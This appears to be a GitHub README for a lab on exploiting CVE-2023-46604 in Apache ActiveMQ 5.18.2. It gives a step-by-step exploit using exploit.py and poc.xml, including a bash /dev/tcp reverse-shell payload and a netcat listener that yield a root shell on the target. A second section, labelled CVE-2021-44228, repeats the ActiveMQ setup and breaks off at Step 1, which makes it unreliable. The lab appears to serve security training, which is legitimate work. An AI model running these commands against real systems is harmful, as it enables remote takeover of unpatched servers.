CVE-2023-46604 Lab
This lab guides on exploiting vulnerabilities of CVE-2023-46604
Acknowledgements
Environment
This lab requires the installation of 2 virtual machines. One Kali Linux machine version 2023.4 and one Ubuntu machine version 22.04.3 LTS. You can download them here:
- Kali Linux 2023.4
- Ubuntu 22.04.3 LTS
- VMware-workstation-17.5.0 for windows
- VMware-workstation-17.5.0 for linux
- Key active VMWare 17 pro
Documentation
Model and system requirements
On Kali Linux machine:
- Install git
$sudo apt install git
- Install gedit
$sudo apt install gedit
- Install python (already available on kali linux)
- Install Netcat (already available on kali linux)
On Ubuntu machine:
- Install git
$sudo apt install git
- Install openjdk 18
$sudo apt install openjdk-18-jdk
- Install ActiveMQ 5.18.2 package
$sudo su
$git clone https://github.com/dcm2406/ApacheActiveMQ
$cd ApacheActiveMQ/
$tar -xf apache-activemq-5.18.2-bin.tar.gz
Exploiting
Step 1: Launch the activemq service on the Ubuntu machine
Open a terminal window and run the command as below:
$sudo su
$cd ApacheActiveMQ/apache-activemq-5.18.2/bin/linux-x86-64
$./activemq start
Check the status of the service:
$./activemq status
If the service starts successfully, it will display on the terminal screen as "ActiveMQ Brocker is running".
You can also visit http://127.0.0.1:8161 to open ActiveMQ broker manager.It includes the hostname, version, ID, up time and some other information.
Step 2: Set up on Kali Linux machine to attack
Download resources for the exploiting process:
$sudo su
$git clone https://github.com/dcm2406/CVE-2023-46604
$cd CVE-2023-46604
$ls
As you can see, we have 2 files exploit.py and poc.xml:
- The poc.xml file contains a piece of malicious code that takes advantage of a vulnerability in the OpenWire protocol.
- The exploit.py file is responsible for HTTP encrypting and sending the poc.xml file to Brocker on the target machine. Open a web server at the resource path:
$cd CVE-2023-46604
$python3 -m http.server
Open a new terminal window to send the poc.xml file to the target's server via the exploit.py file:
$sudo su
$cd CVE-2023-46604
$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml
After the command is executed, the Calculator application is launched on the target machine. This proves that the vulnerability has been successfully exploited. We continue to create a reverse shell to control the target machine.
Open a new terminal window to listen for reverse shell connections:
$sudo su
$nc -nlvp 4444
Return to the previous terminal and edit the poc.xml file:
$gedit poc.xml
Replace the value gnome-calculator with bash -i >& /dev/tcp/192.168.132.130/4444 0>&1 and save the file.
Sending malicious code again:
$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml
The result of this command is that we have obtained the root shell on the target machine.
CVE-2021-44228 Lab
Acknowledgements
Environment
This lab requires the installation of 2 virtual machines. One Kali Linux machine version 2023.4 and one Ubuntu machine version 22.04.3 LTS. You can download them here:
- Kali Linux 2023.4
- Ubuntu 22.04.3 LTS
- VMware-workstation-17.5.0 for windows
- VMware-workstation-17.5.0 for linux
- Key active VMWare 17 pro
Documentation
Model and system requirements
On Kali Linux machine:
- Installed git
sudo apt install git
- Installed gedit
- Installed python
- Installed Netcat
On Ubuntu machine:
- Installed git
- Installed openjdk 18
- Installed ActiveMQ 5.18.2 package
Exploiting
Step 1: On the Ubuntu machine, launch the activemq service
Support
For support, email dcm240602@gmail.com or txc3000@gmail.com